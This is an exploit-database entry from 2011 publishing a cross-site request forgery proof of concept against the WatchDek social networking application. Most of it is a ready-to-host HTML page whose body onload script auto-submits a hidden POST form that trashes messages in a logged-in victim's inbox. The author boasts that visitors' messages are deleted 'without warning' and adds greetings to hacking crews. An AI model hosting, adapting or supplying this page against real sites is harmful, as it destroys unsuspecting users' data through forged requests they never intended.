WatchDek Social Networking XSRF (Force Delete Victim Inbox)

2011-04-10T00:00:00
ID 1337DAY-ID-15816
Type zdt
Reporter ^Xecuti0N3r
Modified 2011-04-10T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            #(+) Exploit Title: WatchDek Social Networking XSRF Vulnerability (Force Delete Victim Inbox)
#(+) Author   : ^Xecuti0n3r
#(+) E-mail  : xecutioner()yahoo.com
#(+) Category  : Web Apps [XSRF]
#(+) App website: watchdek.com

#All you have to do is save the below code as exploit.html
#Then Host a website with the exploit.html file. Any person who visits the website
# will see that all the messages in his watchdek inbox is deleted without warning ;) 
____________________________________________________________________
____________________________________________________________________
Code:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>Watchdek Force Delete Victim Inbox</title>
</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">

function fireForms()
{
    var count = 10;
    var i=0;
    
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
    }
}
    
</script>
<H2>Watchdek Force Delete Victim Inbox</H2>
<form method="POST" name="form3" action="http://localhost:80/index.php?option=com_jam&format=raw">
<input type="hidden" name="search" value=""/>
<input type="hidden" name="mid[]" value="501"/>
<input type="hidden" name="mid[]" value="500"/>
<input type="hidden" name="toggle" value="on"/>
<input type="hidden" name="controller" value="action"/>
<input type="hidden" name="view" value="inbox"/>
<input type="hidden" name="action" value="trash"/>
<input type="hidden" name="limitstart" value="0"/>
<input type="hidden" name="boxchecked" value="2"/>
<input type="hidden" name="attr" value=""/>
<input type="hidden" name="filter_tag" value=""/>
<input type="hidden" name="filter_order" value="m.datetime"/>
</form>
</body>
</html>

########################################################################
(+)Exploit Coded by: ^Xecuti0N3r 
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r
(+)Gr33ts to : -[SiLeNtp0is0n]- , 3thicaln00b, eXes0ul and all Friends at Indian Cyber Army & Indishell Crew
########################################################################



#  0day.today [2018-02-17]  #